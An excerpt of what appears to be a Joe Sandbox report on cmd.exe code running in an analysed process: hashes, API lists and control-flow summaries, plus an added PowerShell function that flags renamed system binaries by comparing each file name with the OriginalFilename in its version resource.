                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale$DefaultUsersetlocale
                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                      • API String ID: 1351325837-2236139042
                                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                      • Instruction ID: 13585ba12c7c99d986d99022a582b6112966797bb33f082acd547125e474cb64
                                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                      • Instruction Fuzzy Hash: BEF17966B0874285EF25EF11D9023B9A6A5FF49B81FC48537CA0D47294EFBCE505C3A2

                                                      Control-flow Graph

                                                      [Control-flow graph of the process-launch function at 7ff7e1dc4224; the original page rendered it as an image with executed and not-executed blocks colour-coded. The blocks call InitializeProcThreadAttributeList, UpdateProcThreadAttribute, memset, GetStartupInfoW, wcsrchr and lstrcmpW, then either CreateProcessW (7ff7e1dc442a) or CreateProcessAsUserW (7ff7e1dc4596), followed by CloseHandle and DeleteProcThreadAttributeList; error paths go through GetLastError and _local_unwind.]
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                      • API String ID: 388421343-2905461000
                                                      • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                      • Instruction ID: 9b4e86260509a5bce545c06528ef87ae747cf0a7992c602a34ff19da5a651ee2
                                                      • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                      • Instruction Fuzzy Hash: B1F15D32A08B8295EB61EB11E4427BAF7A4FB89780F904537D94D42754DFBCE444CBA2

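The strings recovered from this module (COMSPEC, PATHEXT, COPYCMD, \XCOPY.EXE, =ExitCode, =ExitCodeAscii) are cmd.exe internals, so the code analysed here in process 5 is cmd.exe code regardless of the file name it was launched under. A copied binary keeps its PE version resource, and the OriginalFilename field in that resource still names the original file. The check below, an added example that is not part of the Joe Sandbox report, walks a set of directories and flags PE files whose on-disk name differs from the OriginalFilename in their version resource. The scan roots and the watch-list are illustrative assumptions; adjust both to the environment being hunted.

```powershell
# Added example (not part of the sandbox report): find copies of system
# binaries running under another name by comparing the on-disk file name with
# the OriginalFilename field of the PE version resource.
# Assumptions: the scan roots and the watch-list below are illustrative.
function Find-RenamedSystemBinary {
    param(
        [string[]]$Root  = @("$env:PUBLIC", "$env:USERPROFILE"),
        # OriginalFilename values exactly as Windows ships them in the resource
        [string[]]$Watch = @('Cmd.Exe', 'CertUtil.exe')
    )
    foreach ($dir in $Root) {
        Get-ChildItem -Path $dir -File -Recurse -Force -ErrorAction SilentlyContinue |
            ForEach-Object {
                # Works on any file; non-PE files simply have no version resource
                $vi   = [System.Diagnostics.FileVersionInfo]::GetVersionInfo($_.FullName)
                $orig = $vi.OriginalFilename
                if (-not $orig)                  { return }   # no version resource
                if ($Watch -notcontains $orig)   { return }   # -contains is case-insensitive
                if ($_.Name -ieq $orig)          { return }   # name matches, nothing to report
                [pscustomobject]@{
                    Path             = $_.FullName
                    OriginalFilename = $orig
                    SHA256           = (Get-FileHash -Algorithm SHA256 -Path $_.FullName).Hash
                    # A renamed copy is still validly signed; the mismatch is the signal
                    Signature        = (Get-AuthenticodeSignature -FilePath $_.FullName).Status
                }
            }
    }
}

Find-RenamedSystemBinary | Format-Table -AutoSize
```

The signature status is reported on purpose: a byte-for-byte copy of cmd.exe stays validly signed, so code-signing checks alone do not catch this; the name/OriginalFilename mismatch does, and the SHA256 lets the hit be matched against the hashes listed elsewhere in the report.
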
                                                      Control-flow Graph

                                                      [Control-flow graph of the function at 7ff7e1dc5554; the original page rendered it as an image with executed and not-executed blocks colour-coded. The function opens a registry key (RegOpenKeyExW) and reads a series of values with RegQueryValueExW, converting them with _wtol and wcstol; the side branches at 7ff7e1dcf248-7ff7e1dcf44c cover the per-value conversions and an ExpandEnvironmentStringsW call, and the function finishes with RegCloseKey, time, srand and a call to the internal helper at 7ff7e1dc8f80.]
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$CloseOpensrandtime
                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                      • API String ID: 145004033-3846321370
                                                      • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                      • Instruction ID: 77d591e3446ce0f2fca22fb1cff1ccbbca039bd77c76ae0072d5dfcad2d33457
                                                      • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                      • Instruction Fuzzy Hash: CCE19632A1DA82D6EB50EB10E4417BAF7A0FB88741FC05537E58E42A58DFBCD544CB62

Control-flow Graph: function at 7ff7e1dc37d8 (rendered graph not reproduced)
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                      • API String ID: 2624720099-1920437939
                                                      • Opcode ID: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                      • Instruction ID: 47d1fd29b5b00acabf864d9dbf6b996e61c36cb48728def3869b3f6a398cf110
                                                      • Opcode Fuzzy Hash: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                      • Instruction Fuzzy Hash: 4CC1E071F086429AF714FB6498423BDFAA0FF49744FC4853BD90E86695DEBCA440C7A2

Control-flow Graph: function at 7ff7e1dc823c (rendered graph not reproduced)
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileFindFirstLast
                                                      • String ID:
                                                      • API String ID: 873889042-0
                                                      • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                      • Instruction ID: 158bb9ef9b0325c1935fa0e7ccece0d372344554734bac7449e1d756c1d438cb
                                                      • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                      • Instruction Fuzzy Hash: 70516D71A09B4686E700EF11E445779FBA1FB49B82F859532CA1D43354CFBCE464CB61

Control-flow Graph: function at 7ff7e1dc2978 (rendered graph not reproduced)
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                      • Instruction ID: ec894e96bb4b6e7506576d69eb1ec3dc8df868198d466ed4926a31adc3a0c872
                                                      • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                      • Instruction Fuzzy Hash: 0F510462B0868285EB30EB15A9463BAE690FB84BE4FC44632DE6E476D0DF7CE441C651

Control-flow Graph: function at 7ff7e1dc4d5c (rendered graph not reproduced)
                                                      APIs
                                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4D9A
                                                        • Part of subcall function 00007FF7E1DC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7E1DDC6DB), ref: 00007FF7E1DC58EF
                                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4DBB
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC4DCA
                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4DE0
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC4DEE
                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4E04
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC0589
                                                        • Part of subcall function 00007FF7E1DC0580: SetConsoleMode.KERNELBASE ref: 00007FF7E1DC059E
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC05AF
                                                        • Part of subcall function 00007FF7E1DC0580: GetConsoleMode.KERNELBASE ref: 00007FF7E1DC05C5
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC05EF
                                                        • Part of subcall function 00007FF7E1DC0580: GetConsoleMode.KERNELBASE ref: 00007FF7E1DC0605
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC0632
                                                        • Part of subcall function 00007FF7E1DC0580: SetConsoleMode.KERNELBASE ref: 00007FF7E1DC0647
                                                        • Part of subcall function 00007FF7E1DC4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A28
                                                        • Part of subcall function 00007FF7E1DC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A66
                                                        • Part of subcall function 00007FF7E1DC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A7D
                                                        • Part of subcall function 00007FF7E1DC4A14: memmove.MSVCRT(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A9A
                                                        • Part of subcall function 00007FF7E1DC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4AA2
                                                        • Part of subcall function 00007FF7E1DC4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AD6
                                                        • Part of subcall function 00007FF7E1DC4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AEF
                                                        • Part of subcall function 00007FF7E1DC5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7E1DC4E35), ref: 00007FF7E1DC55DA
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC5623
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC5667
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC56BE
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC5702
                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4E35
                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4E81
                                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4F69
                                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4F95
                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FB0
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FC1
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FD8
                                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FF8
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC5037
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC504B
                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC50DF
                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC50F2
                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC510F
                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC5130
                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC514A
                                                      • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC5175
                                                        • Part of subcall function 00007FF7E1DC3578: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                        • Part of subcall function 00007FF7E1DC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                        • Part of subcall function 00007FF7E1DC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                        • Part of subcall function 00007FF7E1DC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                        • Part of subcall function 00007FF7E1DC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
                                                        • Part of subcall function 00007FF7E1DC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                      • API String ID: 1049357271-3021193919
                                                      • Opcode ID: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                      • Instruction ID: 359a3c70616b9cacae5f44e083aeee61fc86ae4e41e3989a39ae451a5ba3c388
                                                      • Opcode Fuzzy Hash: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                      • Instruction Fuzzy Hash: 17C17261E08A4296EB04FB11A806379F7A0FF89B91FC48536D90E43395DFBCE545C3A2

Control-flow Graph: function at 7ff7e1dc3c24 (rendered graph not reproduced)
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                      • String ID: :
                                                      • API String ID: 1809961153-336475711
                                                      • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                      • Instruction ID: 4ec76dc31363dbd345fda882f7e6bc98f7d0c1f480bb4d0d3ff1ce62d33001d8
                                                      • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                      • Instruction Fuzzy Hash: ADD15F32A18B8591EB20EB15E4463B9F7A1FB84740F848A37DA8E437A4DFBCE444C751

                                                      Control-flow Graph

                                                      control_flow_graph 914 7ff7e1dc2394-7ff7e1dc2416 memset call 7ff7e1dbca40 917 7ff7e1dce0d2-7ff7e1dce0da call 7ff7e1dc4c1c 914->917 918 7ff7e1dc241c-7ff7e1dc2453 GetModuleFileNameW call 7ff7e1dc081c 914->918 923 7ff7e1dce0db-7ff7e1dce0ee call 7ff7e1dc498c 917->923 918->923 924 7ff7e1dc2459-7ff7e1dc2468 call 7ff7e1dc081c 918->924 929 7ff7e1dce0f4-7ff7e1dce107 call 7ff7e1dc498c 923->929 924->929 930 7ff7e1dc246e-7ff7e1dc247d call 7ff7e1dc081c 924->930 939 7ff7e1dce10d-7ff7e1dce123 929->939 935 7ff7e1dc2516-7ff7e1dc2529 call 7ff7e1dc498c 930->935 936 7ff7e1dc2483-7ff7e1dc2492 call 7ff7e1dc081c 930->936 935->936 936->939 947 7ff7e1dc2498-7ff7e1dc24a7 call 7ff7e1dc081c 936->947 942 7ff7e1dce125-7ff7e1dce139 wcschr 939->942 943 7ff7e1dce13f-7ff7e1dce17a _wcsupr 939->943 942->943 944 7ff7e1dce27c 942->944 945 7ff7e1dce181-7ff7e1dce199 wcsrchr 943->945 946 7ff7e1dce17c-7ff7e1dce17f 943->946 949 7ff7e1dce283-7ff7e1dce29b call 7ff7e1dc498c 944->949 948 7ff7e1dce19c 945->948 946->948 956 7ff7e1dce2a1-7ff7e1dce2c3 _wcsicmp 947->956 957 7ff7e1dc24ad-7ff7e1dc24c5 call 7ff7e1dc3c24 947->957 951 7ff7e1dce1a0-7ff7e1dce1a7 948->951 949->956 951->951 954 7ff7e1dce1a9-7ff7e1dce1bb 951->954 958 7ff7e1dce264-7ff7e1dce277 call 7ff7e1dc1300 954->958 959 7ff7e1dce1c1-7ff7e1dce1e6 954->959 964 7ff7e1dc24ca-7ff7e1dc24db 957->964 958->944 962 7ff7e1dce1e8-7ff7e1dce1f1 959->962 963 7ff7e1dce21a 959->963 965 7ff7e1dce1f3-7ff7e1dce1f6 962->965 966 7ff7e1dce201-7ff7e1dce210 962->966 969 7ff7e1dce21d-7ff7e1dce21f 963->969 967 7ff7e1dc24e9-7ff7e1dc2514 call 7ff7e1dc8f80 964->967 968 7ff7e1dc24dd-7ff7e1dc24e4 ??_V@YAXPEAX@Z 964->968 965->966 970 7ff7e1dce1f8-7ff7e1dce1ff 965->970 966->963 971 7ff7e1dce212-7ff7e1dce218 966->971 968->967 969->949 973 7ff7e1dce221-7ff7e1dce228 969->973 970->965 970->966 971->969 975 7ff7e1dce254-7ff7e1dce262 973->975 976 7ff7e1dce22a-7ff7e1dce231 973->976 975->944 977 7ff7e1dce234-7ff7e1dce237 976->977 977->975 978 7ff7e1dce239-7ff7e1dce242 977->978 978->975 979 7ff7e1dce244-7ff7e1dce252 978->979 979->975 979->977
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                      • API String ID: 2622545777-4197029667
                                                      • Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                      • Instruction ID: e3ce112b628bd6a685205ba7cf54b56763ecfaa58bffd89a1914da3c8a3066ec
                                                      • Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
